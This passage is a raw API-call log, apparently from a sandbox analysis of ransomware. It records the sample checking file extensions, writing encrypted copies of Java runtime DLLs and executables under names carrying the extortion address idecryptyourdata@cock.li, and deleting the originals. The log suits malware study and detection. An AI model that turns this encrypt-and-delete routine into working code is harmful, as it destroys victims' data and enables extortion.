[0195.893] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0195.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.893] lstrlenW (lpString=".doc") returned 4 [0195.893] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0195.893] lstrlenW (lpString=".docx") returned 5 [0195.893] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0195.893] lstrlenW (lpString=".pdf") returned 4 [0195.893] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0195.893] lstrlenW (lpString=".xls") returned 4 [0195.893] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0195.893] lstrlenW (lpString=".xlsx") returned 5 [0195.893] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0195.893] lstrlenW (lpString=".ppt") returned 4 [0195.893] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0195.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.893] lstrlenW (lpString=".zip") returned 4 [0195.893] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0195.893] lstrlenW (lpString=".rar") returned 4 [0195.893] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0195.894] lstrlenW (lpString=".bz2") returned 4 [0195.894] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0195.894] lstrlenW (lpString=".7z") returned 3 [0195.894] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0195.894] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.894] lstrlenW (lpString=".dbf") returned 4 [0195.894] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0195.894] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.894] lstrlenW (lpString=".1cd") returned 4 [0195.894] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0195.894] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.894] lstrlenW (lpString=".jpg") returned 4 [0195.894] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0195.894] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0195.894] lstrlenW (lpString="glib-lite.dll") returned 13 [0195.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0196.245] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=455744) returned 1 [0196.246] CloseHandle (hObject=0x330) returned 1 [0196.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll")) returned 0x20 [0196.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.249] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0196.251] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.251] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.251] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.252] GetLastError () returned 0x0 [0196.252] ReadFile (in: hFile=0x360, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x6f440, lpOverlapped=0x0) returned 1 [0196.298] WriteFile (in: hFile=0x374, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x6f450, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x6f450, lpOverlapped=0x0) returned 1 [0196.305] ReadFile (in: hFile=0x360, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.305] WriteFile (in: hFile=0x374, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xee, lpOverlapped=0x0) returned 1 [0196.305] SetEndOfFile (hFile=0x374) returned 1 [0196.305] CloseHandle (hObject=0x374) returned 1 [0196.305] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.306] SetEndOfFile (hFile=0x360) returned 1 [0196.309] CloseHandle (hObject=0x360) returned 1 [0196.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.310] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll")) returned 1 [0196.310] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.310] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.310] lstrlenW (lpString=".doc") returned 4 [0196.310] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.310] lstrlenW (lpString=".docx") returned 5 [0196.310] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0196.310] lstrlenW (lpString=".pdf") returned 4 [0196.310] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.310] lstrlenW (lpString=".xls") returned 4 [0196.310] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString=".xlsx") returned 5 [0196.311] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0196.311] lstrlenW (lpString=".ppt") returned 4 [0196.311] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.311] lstrlenW (lpString=".zip") returned 4 [0196.311] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString=".rar") returned 4 [0196.311] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString=".bz2") returned 4 [0196.311] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.311] lstrlenW (lpString=".7z") returned 3 [0196.311] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.311] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.311] lstrlenW (lpString=".dbf") returned 4 [0196.311] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.311] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.311] lstrlenW (lpString=".1cd") returned 4 [0196.311] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.311] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.311] lstrlenW (lpString=".jpg") returned 4 [0196.311] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.311] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.311] lstrlenW (lpString=".doc") returned 4 [0196.311] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString=".docx") returned 5 [0196.311] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0196.311] lstrlenW (lpString=".pdf") returned 4 [0196.311] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.311] lstrlenW (lpString=".xls") returned 4 [0196.312] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.312] lstrlenW (lpString=".xlsx") returned 5 [0196.312] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0196.312] lstrlenW (lpString=".ppt") returned 4 [0196.312] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.312] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.312] lstrlenW (lpString=".zip") returned 4 [0196.312] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.312] lstrlenW (lpString=".rar") returned 4 [0196.312] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.312] lstrlenW (lpString=".bz2") returned 4 [0196.312] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.312] lstrlenW (lpString=".7z") returned 3 [0196.312] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.312] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.312] lstrlenW (lpString=".dbf") returned 4 [0196.312] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.312] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.312] lstrlenW (lpString=".1cd") returned 4 [0196.312] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.312] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 52 [0196.312] lstrlenW (lpString=".jpg") returned 4 [0196.312] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.312] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.312] lstrlenW (lpString="hprof.dll") returned 9 [0196.312] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0196.313] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=158272) returned 1 [0196.313] CloseHandle (hObject=0x360) returned 1 [0196.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll")) returned 0x20 [0196.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.313] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0196.313] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.313] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.313] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.314] GetLastError () returned 0x0 [0196.314] ReadFile (in: hFile=0x360, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x26a40, lpOverlapped=0x0) returned 1 [0196.691] WriteFile (in: hFile=0x374, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x26a50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x26a50, lpOverlapped=0x0) returned 1 [0196.694] ReadFile (in: hFile=0x360, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.694] WriteFile (in: hFile=0x374, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0196.694] SetEndOfFile (hFile=0x374) returned 1 [0196.790] CloseHandle (hObject=0x374) returned 1 [0196.790] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.790] SetEndOfFile (hFile=0x360) returned 1 [0196.792] CloseHandle (hObject=0x360) returned 1 [0196.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.876] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll")) returned 1 [0196.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.876] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.876] lstrlenW (lpString=".doc") returned 4 [0196.876] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.876] lstrlenW (lpString=".docx") returned 5 [0196.876] lstrcmpiW (lpString1=".docx", lpString2="f.dll") returned -1 [0196.876] lstrlenW (lpString=".pdf") returned 4 [0196.876] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.876] lstrlenW (lpString=".xls") returned 4 [0196.876] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.876] lstrlenW (lpString=".xlsx") returned 5 [0196.876] lstrcmpiW (lpString1=".xlsx", lpString2="f.dll") returned -1 [0196.876] lstrlenW (lpString=".ppt") returned 4 [0196.876] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.877] lstrlenW (lpString=".zip") returned 4 [0196.877] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString=".rar") returned 4 [0196.877] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString=".bz2") returned 4 [0196.877] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.877] lstrlenW (lpString=".7z") returned 3 [0196.877] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.877] lstrlenW (lpString=".dbf") returned 4 [0196.877] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.877] lstrlenW (lpString=".1cd") returned 4 [0196.877] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.877] lstrlenW (lpString=".jpg") returned 4 [0196.877] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.877] lstrlenW (lpString=".doc") returned 4 [0196.877] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString=".docx") returned 5 [0196.877] lstrcmpiW (lpString1=".docx", lpString2="f.dll") returned -1 [0196.877] lstrlenW (lpString=".pdf") returned 4 [0196.877] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString=".xls") returned 4 [0196.877] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.877] lstrlenW (lpString=".xlsx") returned 5 [0196.877] lstrcmpiW (lpString1=".xlsx", lpString2="f.dll") returned -1 [0196.878] lstrlenW (lpString=".ppt") returned 4 [0196.878] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.878] lstrlenW (lpString=".zip") returned 4 [0196.878] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.878] lstrlenW (lpString=".rar") returned 4 [0196.878] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.878] lstrlenW (lpString=".bz2") returned 4 [0196.878] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.878] lstrlenW (lpString=".7z") returned 3 [0196.878] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.878] lstrlenW (lpString=".dbf") returned 4 [0196.878] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.878] lstrlenW (lpString=".1cd") returned 4 [0196.878] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0196.878] lstrlenW (lpString=".jpg") returned 4 [0196.878] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.878] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0196.878] lstrlenW (lpString="javacpl.exe") returned 11 [0196.878] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.879] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=80448) returned 1 [0196.879] CloseHandle (hObject=0x350) returned 1 [0196.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe")) returned 0x20 [0196.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.879] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.879] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.880] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.880] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.880] GetLastError () returned 0x0 [0196.880] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x13a40, lpOverlapped=0x0) returned 1 [0196.885] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x13a50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x13a50, lpOverlapped=0x0) returned 1 [0196.887] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.887] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xea, lpOverlapped=0x0) returned 1 [0196.887] SetEndOfFile (hFile=0x3a0) returned 1 [0196.887] CloseHandle (hObject=0x3a0) returned 1 [0196.887] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.887] SetEndOfFile (hFile=0x350) returned 1 [0196.889] CloseHandle (hObject=0x350) returned 1 [0196.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.889] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe")) returned 1 [0196.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.890] lstrlenW (lpString=".doc") returned 4 [0196.890] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.890] lstrlenW (lpString=".docx") returned 5 [0196.890] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0196.890] lstrlenW (lpString=".pdf") returned 4 [0196.890] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.890] lstrlenW (lpString=".xls") returned 4 [0196.890] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.890] lstrlenW (lpString=".xlsx") returned 5 [0196.890] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0196.890] lstrlenW (lpString=".ppt") returned 4 [0196.890] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.890] lstrlenW (lpString=".zip") returned 4 [0196.890] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.890] lstrlenW (lpString=".rar") returned 4 [0196.890] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.890] lstrlenW (lpString=".bz2") returned 4 [0196.891] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.891] lstrlenW (lpString=".7z") returned 3 [0196.891] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.891] lstrlenW (lpString=".dbf") returned 4 [0196.891] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.891] lstrlenW (lpString=".1cd") returned 4 [0196.891] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.891] lstrlenW (lpString=".jpg") returned 4 [0196.891] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.891] lstrlenW (lpString=".doc") returned 4 [0196.891] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.891] lstrlenW (lpString=".docx") returned 5 [0196.891] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0196.891] lstrlenW (lpString=".pdf") returned 4 [0196.891] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.891] lstrlenW (lpString=".xls") returned 4 [0196.891] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.891] lstrlenW (lpString=".xlsx") returned 5 [0196.891] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0196.891] lstrlenW (lpString=".ppt") returned 4 [0196.891] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 50 [0196.891] lstrlenW (lpString=".zip") returned 4 [0196.891] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.892] lstrlenW (lpString=".rar") returned 4 [0196.892] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.892] lstrlenW (lpString=".bz2") returned 4 [0196.892] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.892] lstrlenW (lpString=".7z") returned 3 [0196.892] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.892] lstrlenW (lpString="C:\\Program 